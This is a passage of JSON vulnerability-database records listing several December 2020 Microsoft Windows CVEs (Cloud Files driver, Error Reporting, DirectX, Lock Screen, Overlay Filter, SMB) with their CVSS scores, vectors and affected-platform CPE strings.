"privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-16964", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-16964", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16964", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:x64:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:34:32", "description": "Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17134, CVE-2020-17136.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-17103", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17103", "CVE-2020-17134", "CVE-2020-17136"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-17103", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17103", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:35:16", "description": "Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17103, CVE-2020-17134.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-17136", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17103", "CVE-2020-17134", "CVE-2020-17136"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-17136", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17136", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*"]}, {"lastseen": "2022-03-23T14:35:13", "description": "Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17103, CVE-2020-17136.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-17134", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17103", "CVE-2020-17134", "CVE-2020-17136"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-17134", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17134", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*"]}, {"lastseen": "2022-03-23T14:34:15", "description": "Windows Error Reporting Information Disclosure Vulnerability This CVE ID is unique from CVE-2020-17138.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-17094", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17094", "CVE-2020-17138"], "modified": "2021-03-03T21:34:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-17094", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17094", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:35:19", "description": "Windows Error Reporting Information Disclosure Vulnerability This CVE ID is unique from CVE-2020-17094.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-17138", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17094", "CVE-2020-17138"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:1607"], "id": "CVE-2020-17138", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17138", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:35:16", "description": "DirectX Graphics Kernel Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-17137", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17137"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:2004"], "id": "CVE-2020-17137", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17137", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*"]}, {"lastseen": "2022-03-23T14:34:23", "description": "Windows Lock Screen Security Feature Bypass Vulnerability", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.8, "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-17099", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17099"], "modified": "2021-03-03T21:51:00", "cpe": ["cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-17099", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17099", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:35:19", "description": "Windows Overlay Filter Security Feature Bypass Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-17139", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17139"], "modified": "2021-03-03T21:17:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-17139", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17139", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*"]}, {"lastseen": "2022-03-23T14:35:21", "description": "Windows SMB Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-17140", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17140"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", 